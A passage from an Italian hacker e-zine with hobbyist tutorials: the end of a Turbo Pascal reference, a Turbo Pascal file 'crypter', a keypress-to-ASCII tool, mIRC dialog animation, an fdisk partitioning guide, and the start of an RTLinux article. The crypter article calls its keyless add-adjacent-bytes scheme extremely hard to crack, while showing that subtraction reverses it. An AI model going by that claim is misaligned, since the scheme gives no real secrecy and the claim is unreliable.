 |non cambieranno la funzione, cioè, la funzione non ritornerà niente         |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE VAL;                                                              |
 |PROCEDURE VAL(S; VAR V; VAR CODE:INTEGER);                                  |
 |                                                                            |
 |Converte una stringa in un numero                                           |
 |                                                                            |
 |  - S dev'essere una stringa con dentro dei caratteri ASCII numeri (12345678|
 |9)                                                                          |
 |  - V una variabile integer;                                                |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE WRITE;                                                            |
 |                                                                            |
 |  - PROCEDURE WRITE(F,V1 [,V2,...,VN] );                                    |
 |  - PROCEDURE WRITE([VAR F:TEXT;] P1 [,P2,...,PN] );                        |
 |                                                                            |
 |no comment                                                                  |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |PROCEDURE WRITELN;                                                          |
 |                                                                            |
 |PROCEDURE WRITELN([VAR F:TEXT; ] P1 [,P2,...,PN] );                         |
 |                                                                            |
 |no comment                                                                  |
 |                                                                            |
 |----------------------------------------------------------------------------|
 |                                                                            |
 |Vi faccio notare che ho saltato le variabili del TP perché altrimenti il    |
 |tutorial sarebbe stato TROPPO lungo...                                      |
 |quindi, per spiegazioni leggete la fine del tute                            |
 |                                                                            |
 |Ebbene sì è finito il tutorial!                                             |
 |                                                                            |
 |Bien, this is all punks!                                                    |
 |                                                                            |
 |Byezz                                                                       |
 |                                                                            |
 |P.S. Per spiegazioni, progetti, abusi, darmi un milardo di euri, minacce,   |
 |     insulti, negazioni di diritti, distruzione di computer a guadagno, spam|
 |     fregarmi la password, se siete belle ragazze, se non sapete che sono   |
 |     fidanzato e volete trombarmi comunque, allora                          |
 |                                                                            |
 |            E-MAILATEMI ALL'INDIRIZZO: jnsmith_86@hotmail.com               |
 |                                                                            |
 |Eimiar - 7H3 N4M3 WR073 0N 7H3 5M0K3                                        |
 +----------------------------------------------------------------------------+


+--------------------------------------------------------------[open the file]-+
|[ PROGRAMMAZIONE ]                                                            | 
|-- Crypter in Turbo pascal conveniente                                        | 
|-- Eimiar <jnsmith_86@hotmail.com>                                            |
|                     _________________________________________________________| 
|____________________/
 +----------------------------------------------------------------------------+
 |Eimiar - 7H3 N4M3 WR073 0N 7H3 5M0K3                                        |
 | ...PrEsEnTs...                                                             |
 |                                                                            |
 |®ÖÖÊÓ’MMW{Sn‚�€Sw©‚gjSP~nW{SU‚}{~3®ÖÖÊÓ’MMW{Sn‚�€Sw©‚gjSP~nW{SU‚}{~3®ÖÖÊ|
 |Ó’MMW{Sn‚�€Sw©‚gjS  CRYPTER IN TURBO PASCAL CONVENIENTE  W{SU‚}{~3®ÖÖÊÓ’MM|
 |W{Sn‚�€Sw©‚gjSP~nW{SU‚}{~3®ÖÖÊÓ’MMW{Sn‚�€Sw©‚gjSP~nW{SU‚}{~3®ÖÖÊÓ’MMW{S|
 |                                                                            |
 |®ÖÖÊÓ’MMW{Sn‚�€Sw©‚gjSP~nW{SU‚}{~3  <---- Questa è una frase criptata, voi|
 |aspiranti crackers, trovate l'algoritmo :D                                  |
 |                                                                            |
 |eheheh, potrete riuscirci, ma io, tre settimane dopo che l'ho data a un mio |
 |amico 'sta frase, lui mi ha detto: mi arrendo, passami la frase originale   |
 |                                                                            |
 |una volta che gliel'ho passata 'sto qua mi fa:                              |
 | - ma come c***o hai fatto ?!? -                                            |
 |se volete sapere come finisce la puntata (loool) rimanete incollati al video|
 |anche perché l'algoritmo (se lo si può chiamare così) non è poi chissà che..|
 |ma è difficilissimo da scovare...                                           |
 |siccome qualcuno crede che ci sia di mezzo una chiave...                    |
 |INVECE NON C'È NESSUNA CHIAVE!!!                                            |
 |È QUESTO IL BELLO DEL MIO CRYPTER!!!                                        |
 |                                                                            |
 |prima di cominciare, ringrazio SysOv3rrid3 per aver partecipato al progetto |
 |con me che si è curato della grafica del programma, siccome vi ho detto che |
 |io sono senza fantasia, ci vuole qualcuno che mi "fantasizzi" my projects   |
 |                                                                            |
 |                                 COMINCIAMO!                                |
 |Bè ragazzi, io sono qua, perché non metterci al lavoro?                     |
 |allora, innanzitutto, vi serviranno delle basi della libreria system per il |
 |flusso I/O su dati, (intendo le funzioni FILEPOS, FILESIZE e SEEK           |
 |quindi, non mi metterò adesso a spiegarle siccome sono già in un mio tute   |
 |in questa e-zine...                                                         |
 |                                                                            |
 |beh, l'algoritmo è molto semplice:                                          |
 |un algoritmo che legge un carattere dentro un file, legge quello dopo, e poi|
 |fa la somma dei numeri ordinali dei due caratteri (il loro numero ASCII)    |
 |tutto quanto viene semplificato siccome nel progetto usiamo al posto di file|
 |of char, dei file of byte...                                                |
 |                                                                            |
 |probabilmente c'è ancora qualcuno che non ha capito questo basilari concetti|
 |e adesso me li metto a spiegare...                                          |
 |                                                                            |
 |quando noi dichiariamo un file come file of char, otteniamo un file i cui   |
 |dati contenuti possono essere memorizzati SOLO in variabili del tipo che è  |
 |il file...                                                                  |
 |Eggzample!                                                                  |
 |i dati di un file of char possono essere memorizzati SOLO dentro variabili  |
 |CHAR o FORSE string (dico forse perché non ho mai provato)                  |
 |                                                                            |
 |mentre i dati di un file of byte possono essere memorizzati SOLO dentro     |
 |variabili BYTE, e FORSE anche integer o word (idem)                         |
 |                                                                            |
 |la differenza non è molta, solo che in alcuni casi vi ritroverete in un modo|
 |più EASY (è inglish, ma è più figus!) di trattare i files...                |
 |                                                                            |
 |v'as capì?                                                                  |
 |                                                                            |
 |ok, torniamo al nostro progetto                                             |
 |abbiamo detto che legge l'Nesimo carattere, l'Nesimo+1 carattere, e li somma|
 |il risultato della somma viene sovrascritto al primo degli Nesimi caratteri |
 |v'as capì?                                                                  |
 |                                                                            |
 |facciamo un esempio stupido ma che farà capire MOLTE cose:                  |
 |nel file CIAO.TXT c'è la scritta EIMIAR                                     |
 |se criptiamo 'sto file otteniamo il seguente testo:                         |
 |Ž––Š“R                                                                      |
 |perché?!?                                                                   |
 |seguiamo il "ragionamento" che ha fatto il computer:                        |
 |                                                                            |
 |Il primo carattere = E e il secondo carattere = I                           |
 |quindi, trasformiamoli in numeri e otteniamo:                               |
 |E = 69      -      I = 73                                                   |
 |se sommiamo i due numeri, otterremo 69+73 = 142                             |
 |ovvero il carattere 'Ž' (dovrebbe essere la 'a' con i due puntini sopra)    |
 |                                                                            |
 |facciamo lo stesso procedimento con gli altri caratteri                     |
 |Il secondo carattere = I e il terzo carattere = M                           |
 |cioè 73 e 77                                                                |
 |73+77=150, cioè il carattere '–' = u con l'accento circonflesso             |
 |                                                                            |
 |Il terzo carattere + il quarto = –                                          |
 |eccetera eccetera                                                           |
 |                                                                            |
 |v'as capì?                                                                  |
 |ebbene sì, miei cari amici studenti, questo è l'algoritmo che usa il mio    |
 |crypter :D  non ve l'aspettavate eh?                                        |
 |avrete sicuramente capito che l'ultimo carattere rimane invariato prima di  |
 |tutto perché dopo di quel carattere non c'è nessun altro carattere con cui  |
 |sommarsi, e poi perché da quel carattere, arriviamo all'algoritmo di        |
 |decrittazione                                                               |
 |                                                                            |
 |beh, siccome il crypter somma ogni carattere con l'altro, allora non è poi  |
 |così tanto difficile arrivare alla conclusione che se noi sottraiamo il last|
 |char del file con quello che lo precede, otteniamo il carattere com'era     |
 |before...                                                                   |
 |                                                                            |
 |quindi, il penultimo carattere = ord('“') - ord('R')                        |
 |cioè A                                                                      |
 |                                                                            |
 |il problema sarà poi dire al prog che non deve andare prima dell'inizio del |
 |file (il byte 0)                                                            |
 |                                                                            |
 |vabbè, basta pugnette, è ora di farvi vedere il progetto                    |
 |                                                                            |
 +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
 |program crypter2;                                                           |
 |uses crt;                                                                   |
 |label ciao;                                                                 |
 |var c,ch:byte;                                                              |
 |    cara:char;                                                              |
 |    source:file of byte;                                                    |
 |    destin:file of byte;                                                    |
 |    x,y:integer;                                                            |
 |                                                                            |
 |    INPUT:STRING;                                                           |
 |    OUTPUT:STRING;                                                          |
 |                                                                            |
 |begin                                                                       |
 |clrscr;                                                                     |
 |gotoxy(10,12);                                                              |
 |writeln('CRYPTER DI EIMIAR');                                               |
 |gotoxy(5,13);                                                               |
 |write('Vuoi (C)riptare o (D)ecriptare? ');                                  |
 |x:=wherex;                                                                  |
 |y:=wherey-1;                                                                |
 |repeat                                                                      |
 |gotoxy(x,y+1);                                                              |
 |cara:=readkey;                                                              |
 |until (cara='c') or (cara='C') or (cara='d') or (cara='D');                 |
 |                                                                            |
 |if (cara='d') or (cara='D') then                                            |
 | begin                                                                      |
 |  clrscr;                                                                   |
 |  write('Inserisci il file da decriptare: ');                               |
 |  readln(INPUT);                                                            |
 |                                                                            |
 |  assign(source,INPUT);                                                     |
 |  reset(source);                                                            |
 |                                                                            |
 |  x:=1;                                                                     |
 | while true do                                                              |
 |  begin                                                                     |
 |   if x=1 then goto ciao;                                                   |
 |   if filepos(source)=0 then break;                                         |
 |   ciao:                                                                    |
 |   seek(source,FileSize(source)-x);                                         |
 |   if filepos(source)=0 then break;                                         |
 |   read(source,c);                                                          |
 |   if filepos(source)=0 then break;                                         |
 |   seek(source,FileSize(source)-(x+1));                                     |
 |   if filepos(source)=0 then break;                                         |
 |   read(source,ch);                                                         |
 |   if filepos(source)=0 then break;                                         |
 |   seek(source,FileSize(source)-(x+1));                                     |
 |   if filepos(source)=0 then break;                                         |
 |   ch:=ch-c;                                                                |
 |   if filepos(source)=0 then break;                                         |
 |   write(source,ch);                                                        |
 |   if filepos(source)=0 then break;                                         |
 |   x:=x+1;                                                                  |
 |   if filepos(source)=0 then break;                                         |
 |  end;                                                                      |
 | seek(source,1);                                                            |
 | read(source,c);                                                            |
 | seek(source,0);                                                            |
 | read(source,ch);                                                           |
 | ch:=ch-c;                                                                  |
 | seek(source,0);                                                            |
 | write(source,ch);                                                          |
 |                                                                            |
 | close(source);                                                             |
 |                                                                            |
 | end;                                                                       |
 |                                                                            |
 |                                                                            |
 |if (cara='c') or (cara='C') then                                            |
 | begin                                                                      |
 |  clrscr;                                                                   |
 |  write('Inserisci il file sorgente: ');                                    |
 |  readln(INPUT);                                                            |
 |  write('Inserisci il file destinazione: ');                                |
 |  readln(OUTPUT);                                                           |
 |                                                                            |
 |  assign(source,INPUT);                                                     |
 |  assign(destin,OUTPUT);                                                    |
 |  reset(source);                                                            |
 |  rewrite(destin);                                                          |
 |                                                                            |
 |                                                                            |
 |  while not eof(source) do                                                  |
 |   begin                                                                    |
 |    read(source,c);                                                         |
 |    if (not eof(source)) then                                               |
 |     begin                                                                  |
 |      read(source,ch);                                                      |
 |      seek(source,(FilePos(source)-1));                                     |
 |      c:=c+ch;                                                              |
 |     end;                                                                   |
 |    write(destin,c);                                                        |
 |    c:=0;                                                                   |
 |    ch:=0;                                                                  |
 |   end;                                                                     |
 |                                                                            |
 |  close(source);                                                            |
 |  close(destin);                                                            |
 | end;                                                                       |
 |end.                                                                        |
 +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
 |bè, buon studio (e non buon criptaggio)                                     |
 |la versione aggiornata, quella con la grafica ottimizzata verrà pubblicata  |
 |nel sito di informazione libera solamente quando il progetto sarà finito e  |
 |se ci sarà una sezione dove il mio prog potrà essere messo...               |
 |:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D|
 |                                                                            |
 |Bien, this is all punks!                                                    |
 |                                                                            |
 |Byezz                                                                       |
 |                                                                            |
 |P.S. Per spiegazioni, progetti, abusi, darmi un milardo di euri, minacce,   |
 |     insulti, negazioni di diritti, distruzione di computer a guadagno, spam|
 |     fregarmi la password, se siete belle ragazze, se non sapete che sono   |
 |     fidanzato e volete trombarmi comunque, allora                          |
 |                                                                            |
 |            E-MAILATEMI ALL'INDIRIZZO: jnsmith_86@hotmail.com               |
 |                                                                            |
 |Eimiar - 7H3 N4M3 WR073 0N 7H3 5M0K3                                        |
 +----------------------------------------------------------------------------+


+--------------------------------------------------------------[open the file]-+
|[ PROGRAMMAZIONE ]                                                            | 
|-- Ascii Taker                                                                | 
|-- Eimiar <jnsmith_86@hotmail.com>                                            |
|                     _________________________________________________________| 
|____________________/
 +----------------------------------------------------------------------------+
 |Eimiar - 7H3 N4M3 WR073 0N 7H3 5M0K3                                        |
 | ...PrEsEnTs...                                                             |
 |                                                                            |
 |6910510910597114324532557251327852775132878248555132487832557251325377487551|
 |6910510910597114324             ASCII TAKER           7832557251325377487551|
 |6910510910597114324532557251327852775132878248555132487832557251325377487551|
 |                                                                            |
 |Ringrazio lordlothar per l'idea :D                                          |
 |Anche se come idea non sarebbe poi così tanto...                            |
 |                                                                            |
 |Un giorno lordlothar (d'ora in poi LL) mi invia un programmino della mutua  |
 |fatto in C che ti legge i caratteri dalla tastiera e li trasforma in numeri |
 |direttamente sulla console...                                               |
 |in realtà il progetto non è poi così tanto difficile, ma il "tool" può      |
 |essere utile...                                                             |
 |non vi sto a spiegare il progetto perché è una cazzata assurda (mi è venuto |
 |dopo una sbornia :D)                                                        |
 |                                                                            |
 +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
 |uses crt;                                                                   |
 |var b:byte;                                                                 |
 |    c:char;                                                                 |
 |    i:integer;                                                              |
 |                                                                            |
 |procedure sw;                                                               |
 |begin                                                                       |
 |for i:=0 to 255 do                                                          |
 |begin                                                                       |
 | if c=chr(i) then b:=i;                                                     |
 |end;                                                                        |
 |end;                                                                        |
 |                                                                            |
 |begin                                                                       |
 |clrscr;                                                                     |
 |writeln('           Premi qualche tasto per vederlo in numero');            |
 |writeln('  ESC per uscire');                                                |
 |repeat                                                                      |
 |c:=readkey;                                                                 |
 |sw;                                                                         |
 |write(b,' ');                                                               |
 |until b=27;                                                                 |
 |end.                                                                        |
 +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
 |ma in realtà c'è un altro modo più corto e meno "occuposo" al computer      |
 +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
 |uses crt;                                                                   |
 |var c:char;                                                                 |
 |                                                                            |
 |begin                                                                       |
 |clrscr;                                                                     |
 |writeln('           Premi qualche tasto per vederlo in numero');            |
 |writeln('  ESC per uscire');                                                |
 |repeat                                                                      |
 |c:=readkey;                                                                 |
 |write(ord(c),' ');                                                          |
 |until c=chr(27);                                                            |
 |end.                                                                        |
 +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
 |v'as capì?                                                                  |
 |                                                                            |
 |Bien, this is all punks!                                                    |
 |                                                                            |
 |Byezz                                                                       |
 |                                                                            |
 |P.S. Per spiegazioni, progetti, abusi, darmi un milardo di euri, minacce,   |
 |     insulti, negazioni di diritti, distruzione di computer a guadagno, spam|
 |     fregarmi la password, se siete belle ragazze, se non sapete che sono   |
 |     fidanzato e volete trombarmi comunque e non avete l'AIDS o SARS, allora|
 |                                                                            |
 |            E-MAILATEMI ALL'INDIRIZZO: jnsmith_86@hotmail.com               |
 |                                                                            |
 |Eimiar - 7H3 N4M3 WR073 0N 7H3 5M0K3                                        |
 +----------------------------------------------------------------------------+


+--------------------------------------------------------------[open the file]-+
|[ MIRC SCRIPTING ]                                                            | 
|-- Grafica in mirc                                                            | 
|-- Blacksword <blacksword1@libero.it>                                         |
|                     _________________________________________________________| 
|____________________/
Ciao  ragazzi.Finalmente  sono  pronto  per  scrivere  un'atra  guida  sul  mirc
scripting.Oggi vorrei dedicarmi in particolare alla grafica in mirc.Ho deciso di
spiegare  come  è  possibile creare un testo scorrevole in una editbox.Parlo  di
qualcosa  simile  a quell'editbox presente sullo script xstyle,  non  so  se  lo
conoscete.Ma comunque la scritta in questione scorre fino a quando non si decide
di bloccarla.Bando alle chance e cominciamo.Vi posto subito il sorgente.

dialog move {
  title "Dialog1"
  size 304 178 139 80
  option dbu
  box "", 2, 16 19 64 12
  text "", 1, 20 24 56 6
  button "&Hide", 3, 0 0 0 0, hide Ok
}
on 1:DIALOG:move:init:0: inmv
alias inmv { set %length $len(%testo) | /.timercn -h 0 150 move }
alias move {
  unset %pos
  did -r move 1
  did -a move 1 $mid(%testo,%length)
  dec %length
  if (%length == 0 ) { timercn off | /.timer2 -h 0 150 move1 }
}
alias move1 {
  inc %pos
  if (%pos == 38) { timer2 off | /.timer 1 1 inmv }
  did -a move 1 $str($chr(160),%pos) $+ %testo
}
alias fr { /.timer2 off | /.timercn off

Allora passiamo alle spiegazioni. Innanzitutto creiamo un dialog con dentro  una
editbox.In questo script facciamo ricorso ai timer.Quel parametro -h  indica  il
conteggio in millisecondi.Una raccomandazione: negli script non utilizzate molto
spesso timer di questo genere in quanto essi utilizzano molte risorse di sistema
purtroppo  e’ un computer un pò vecchiotto potrebbe anche crashare a  causa  del
loro  utilizzo.Comunque,  come potete vedere lo script  è  molto  semplice,  può
essere  capito  anche dai neofiti di mirc scripting, dagli scripters  che  hanno
appena  intrapeso  l'arte  dello scriptare ( "arte" !!!!!  Sto  esagerando  ????
).Nello  script  si  fa ricorso ad un init.Un evento legato all'apertura  di  un
dialog.Questo init mette in movimento il timer in millisecondi che a  sua  volta
provoca  l'inizio  di un alias in cui si dice al mirc di far avanzare  il  testo
nella  edit.Come? con degli spazi.Direte voi dove sono questi spazi?  Essi  sono
indicati con il valore ascii 160.Non fate l'errore di sostituire 160 con 32,  in
quanto  comprometterete il funzionamento dello script,anche se entrambi i valori
ascii indicano degli spazi.Infine per bloccare l'avanzamento della scritta basta
bloccare  i  timer in millisecondi.Per tale fine ho inserito un alias.Ovviamente
questa parte di codice dovrà essere integrata a ciò che voi volete fare.Una cosa
dimenticavo.Il testo che avanza nella editbox è contenuto nella variabile %testo
che  potete riempire con qualsiasi frase parole che volete.E siamo giunti  anche
questa  volta al nostro breve ma inteso tutorial.Ci rivediamo la prossima  volta
con altre cosette del genere. Ciaoooooooooooooo


+--------------------------------------------------------------[open the file]-+
|[ LINUX ]                                                                     | 
|-- HOW TO: PENGUIN'S FDISK                                                    | 
|-- Native <native@autistici.org>                                              |
|                     _________________________________________________________| 
|____________________/ 

    +-=-=-=-=-=-=-=-=-=-=-=-=-+
    | HOW TO: PENGUIN'S FDISK |
    +-=-=-=-=-=-=-=-=-=-=-=-=-+

_(Index
=-=-=-=-
_(Index
_(Introduzione
_(File Systems
_(Via alle Danze
_(Conclusione
_(Fonti
_(About
_(Art


_(Introduzione
=-=-=-=-=-=-=-=
Chissà  quanti  di  voi  la prima volta che hanno tentato  di  installare  Linux
avevano una tremenda paura per il rischio di mandare tutto per aria, compresa la
tanto amata partizione di Windoze. Beh, il problema evidentemente era causato da
una  vostra insicurezza sul  metodo di partizionamento del vostro (o vostri) HD.
Leggendo  questo  paper sarete in grado di partizionare e gestire  al  meglio  i
vostri dischi fissi, direttamente dalla shell.


_(Tipi di partizioni e File System
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Prima di passare alla pratica, vorrei darvi un'infarinatura generale sui tipi di
partizioni e sui file system. Senza dilungarmi troppo in particolari tecnici  vi
faccio  presente che il pinguino indica le partizioni presenti su un  hard  disk
come /dev/hd[XY] dove (X) è una lettera che contraddistingue il nostro hard disk
(a  per il primary master, b per il primary slave, c per il secondary master,  d
per  il  secondary  slave)  e  (Y)  indica il  numero  che  contraddistingue  la
partizione  (da  1 a 4 per le primarie/estese, da 5 in poi per le  logiche).  Ad
ogni partizione verrà associato un file system. Ma cos'è il file system? Il file
system  è l'organizzazione dei file su un computer; la struttura delle directory
e  il modo in cui i file  vengono posizionati sui dischi. Ogni sistema operativo
ha  un suo file system specifico. Linux come file systems utilizza Ext2, Ext3  e
reiserfs; il primo  rappresenta il file system tradizionale di Linux,  mentre  i
il secondo  e il terzo ne rappresentano l'evoluzione journaled. Windoze 95/98/me
usa  come  file system Fat32 (ovvero File Allocation  Table 32), mentre  Windoze
NT/2k/XP protende all'NTFS (ovvero NT File  System).


_(Strumenti necessari
=-=-=-=-=-=-=-=-=-=-=
Ora  che  sapete  cos'è un File System, possiamo elencare le  applicazioni   che
useremo  per  partizionare il vostro HD. Da shell esistono due  programmi  molto
simili:

- fdisk
- cfdisk

L'unica differenza è che il primo è utilizzabile da console testuale,  mentre il
secondo offre un utility visuale in più. Siccome i concetti  sono gli stessi sia
per  fdisk  che  per  cfdisk, io esaminerò per voi  "fdisk",  in  quanto  è  più
semplice  da  spiegare.  *Nota: ovviamente tutto ciò che  faremo  necessita  dei
privilegi di Root.


_(Via alle Danze
=-=-=-=-=-=-=-=-
Ora  che  sappiamo che strumenti adopereremo possiamo dare il via  alle   danze.
Però  vi chiedo per favore di non continuare a leggere questo capitolo   se  non
avete  fatto almeno una copia di backup dei vostri dati.  Perchè? Perchè c'è  il
20%  delle  possibilità  (dati  presi  dall'x-Stealth  corp.  2002/2003  ;)  che
sbagliate a fare qualcosa e perdete i vostri dati. Non è per mettervi paura,  ma
è  la  realtà:  ricordate, la prudenza non è mai troppa. Comunque,  abbiamo  due
possibilità: o abbiamo un unico HD in cui vogliamo  installare sia  Windoze  che
Linux,  oppure abbiamo due HD in cui mettere in uno Windoze e nell'altro  Linux.
Resta   il  fatto  che  il  procedimento  è  *pressapoco*  lo  stesso.   Allora,
innanzitutto,  per  chi non lo sapesse, premetto che il Pinguino   necessita  al
minimo  di due partizioni, una linux native (ext2, ext3 o reiserfs) e una  linux
swap;  è comunque preferibile avere tre partizioni, due linux native e una linux
swap.  E' preferibile creare due linux native perchè in una ci andrà il  sistema
operativo, nell'altra i nostri porn... ehm... documenti :D A parte gli  scherzi,
così  se vorremo ad esempio cambiare distro formatteremo solo la partizione  del
S.O. mantenendo così intatti i nostri dati (talvolta importanti). Ok, bando alle
ciance, prima cosa avviamo fdisk indicando come parametro l'HD.
Ad  esempio potremmo indicare /dev/hda o /dev/hdb, per indicare  rispettivamente
il primo o il secondo harddisk del canale IDE; se invece abbiamo un disco rigido
SCSI  potremmo dare come parametro /dev/sda o /dev/sdb; se abbiamo un'unità PS/2
ESDI  il  parametro  sarà /dev/eda o /dev/edb. Noi facciamo l'esempio  di  avere
l'HD sul canale IDE, precisamente  il secondo (/dev/hdb) e con 20 GB di capacità
e *senza partizioni già definite*: in caso avete partizioni già definite, allora
o  le cancellate o le lasciate e ne aggiungete di nuove, su lo spazio non ancora
allocato.  Prima di iniziare con la parte pratica, voglio illustrarvi come  sarà
alla fine del procedimento di partizionamento il vostro disco.

 [Immagine 1]:

    +---------------------------------------------+
    |      /dev/hdb: 20 GigaByte      |
    +---------------+---------------+-------------+
    |  /dev/hdb1  |  /dev/hdb5  | /dev/hdb6   |
    |    9 GB|    10 GB    |   1 GB      |
    +---------------+---------------+-------------+
    | LINUX NATIVE| LINUX NATIVE|    SWAP     |
    +---------------+---------------+-------------+


L'immagine 1 rappresenta come il vostro disco sarà se applicherete ciò che andrò
a spiegarvi d'ora in poi. Allora cominciamo dando da shell:

fdisk /dev/hdb

Ecco cosa probabilmente vi apparirà:

[root@localhost native]# fdisk /dev/hdb

The  number  of  cylinders for this disk is set to 2498. There is nothing  wrong
with  that,  but  this  is larger than 1024, and could in certain  setups  cause
problems with:
1) software that runs at boot time (e.g., old versions of LILO)
2) booting and partitioning software from other OSs
   (e.g., DOS FDISK, OS/2 FDISK)

Comando (m per richiamare la guida): _

Noi  diamo  il  comando "m" per farci un'idea sulle opzioni  e  funzionalità  di
fdisk.
Ecco l'output:

Comando (m per richiamare la guida): m

Azione         Comando

   a     Cambia bootable flag
   b     modifica di bsd disklabel
   c     cambia il flag compatibile con il dos
   d     cancellazione di una partizione
   l     elenco dei tipi di partizione conosciuti
   m     stampa di questo menu
   n     aggiunta di una nuova partizione
   o     creazione di una nuova tabella delle partizioni DOS vuota
   p     stampa della tabella delle partizioni
   q     uscita senza salvataggio delle modifiche
   s     creazione di una nuova disklabel Sun vuota
   t     modifica dell'id di sistema di una partizione
   u     modifica delle unità di visualizzazione/di immissione
   v     verifica della tabella delle partizioni
   w     scrittura della tabella su disco e uscita
   x     ulteriori funzioni (solo per esperti)


Iniziamo  col dare il comando "p" che equivale (più o meno) al comando  "df"  di
linux, che indica la situazione attuale del disco. Ora diamo il comando "n"  per
creare  le  nuove  partizioni e fdisk di  chiederà se dovrà  essere  primaria  o
logica  ed il numero che  identificherà la partizione (da 1 a 4). Noi diremo  di
crearne  una   primaria,  ed il numero che le assegneremo  sarà  l'uno  (1).  In
seguito  fdisk ci chiederà la dimensione della partizione. Dovremo  indicare  la
dimensione  con  una  cifra  preceduta dal segno  più  ("+")  e  seguita  da  un
indicatore di misura (M per MegaByte,  G per GigaByte), ad es.: "+9G"  indica  9
Gigabyte.  Ripetiamo  il procedimento creando un'altra partizione  logica  linux
native  alla quale in seguito setterete come mount point /home o /usr. Diamo  il
comando "n". Indichiamogli che la partizione dovrà essere  logica e assegnamogli
un  numero  da  5  a 6: la scelta ovvia sarà  cinque ( 5 <- ma  li  conoscete  i
numeri?). Riguardo la dimensione scegliete voi, ma ricordate di lasciar  un  po'
di  spazio  (minimo 256MB) per la partizione di swap che andremo a  creare   fra
poco. Ad esempio diamogli +10G (10 GigaBytes). Questa partizione è destinata  ad
archiviare  i  vostri  dati. Create le partizioni Linux  native,  passiamo  alla
creazione  della   partizione  di swap. *NOTA: di default  la  partizione  viene
creata  di  tipo  "linux  native",  perciò  dopo  dovremo  cambiarne  il   tipo.
Assegneremo  alla  partizione di swap minimo 256 MB. Quindi seguite  lo   stesso
procedimento  di prima con la differenza di cambiarne il tipo, col comando  "t",
in modo da poter cambiare l'id di sistema della  partizione prescelta tramite il
numero  identificativo  dello swap  (per lo swap l'id è  82,  mentre  per  linux
native (quella di default) è 83). Ora diamo un occhiata generale alla situazione
(ancora  non  salvata) delle nostre partizioni attraverso il  comando  "p".  Per
esempio questa è la mia situazione attuale, e Linux va una meraviglia!

Comando (m per richiamare la guida): p

Disco /dev/hdb: 255 testine, 63 settori, 2498 cilindri
Unità = cilindri di 16065 * 512 byte

Dispositivo Avvio    Inizio    Fine   Blocchi   Id  Sistema
/dev/hdb1   *           1      1041   8361801   83  Linux
/dev/hdb5            1042      1102    489951   82  Linux swap
/dev/hdb6            1103      2498  11213338+  83  Linux

Vedete, ci sono tre partizioni, come vi dicevo prima.
/dev/hdb1 è la partizione primaria del Sistema Operativo;
/dev/hdb5 è la partizione logica di Swap;
/dev/hdb6 è la partizione logica dell'archivio (montata su /home).
L'unico  dubbio che vi può sorgere è quello dell'asterisco (*) sotto Avvio  e  a
destra  di /dev/hdb1: bene, quello è il bootable flag, ovvero  indica che quella
è  la  partizione  da cui dovrà essere "bootato" Linux. Per  settarla  basta  il
comando "a" seguito dall'indicazione del numero della partizione desiderata  (da
1  a  6).  Se  tutto  ciò che abbiamo fatto rispecchia alle  nostre  aspettative
possiamo  salvare  col comando "w": a tal punto fdisk vi chiederà  conferma:  se
accettate  scriverà  la  tabella delle partizioni, altrimenti  non  farà   nulla
sull'HD ed uscirà.


_(Conclusione
=-=-=-=-=-=-=-
Il  nostro disco è pronto per l'installazione del Pinguino, durante la quale  vi
chiederà quali file system utilizzare per le due Linux native: io li ho  provati
tutti,  e  vi assicurò che con EXT3 si lavora moooolto bene, altro che  FAT32...
Concludo questo paper consigliandovi di provare e riprovare, in modo di affinare
la  vostra  arte nel partizionare. Spero di aver suscitato un pò d'interesse  in
questo magnifico progetto (ideato da inquis) e spero soprattutto che qualcuno si
preoccupi  a  portarlo  avanti.  Per qualsiasi cosa,  basta  mandarmi  un'e-mail
all'indirizzo riportato in fondo.  Di nuovo, grazie per l'interesse!


_(Fonti
-=-=-=-
° Partizionare l'Hard Disk per Linux (A. Scrimieri)


_(About
-=-=-=-=

~|Author:          native
~|Date:            21/06/2003
~|Mail:            native@autistici.org
~|Crew's Chan:     #x-Stealth @ irc.azzurra.org
~|Crew's Site:     http://www.x-stealth.tk
~|Special Thanks:  - l'x-Stealth Crew (Simply the Best!)
                   - Bucciarati (+CLAVSTROMANiA, +CELODVRiSMO)
                   - OQ, BFi, IL, Phrack e le altre e-Zines della Net
~|Special Fucks:   - HackerJ*urnal (Lamer con la 'L' maiuscola!)

 +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
 | __  __    ______________  _   _  _______   _   __________________ |
 | \ \/ /   / __|_   _| __| /^\ | ||_   _| |_| | /  _| > \ __| | | | |
 |  >  < -- \__ \ | | | __|/ _ \| |_ | | |  _  | | |_| > / __| | | | |
 | /_/\_\   |___/ |_| |___|_/ \_|___\|_| |_| |_| \___|_|_\___|_____| |
 |                                                                   |
 +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+



+--------------------------------------------------------------[open the file]-+
|[ LINUX ]                                                                     | 
|-- RtLinux e le applicazioni realtime                                         | 
|-- Marsio <marsio@securitynode.org>                                           |
|                     _________________________________________________________| 
|____________________/ 

 RTLINUX E LE APPLICAZIONI REALTIME
 ===================================


1) Introduzione
2) Come installare RTLinux
3) Come avviare RTLinux
4) Come testare RTLinux
5) Come codare un programma che  scrive su un FIFO i numeri interi da 0 a 9  in
   ordine crescente
6) Come codare un programma che apra un device FIFO e ne legge il contenuto  in
   uscita
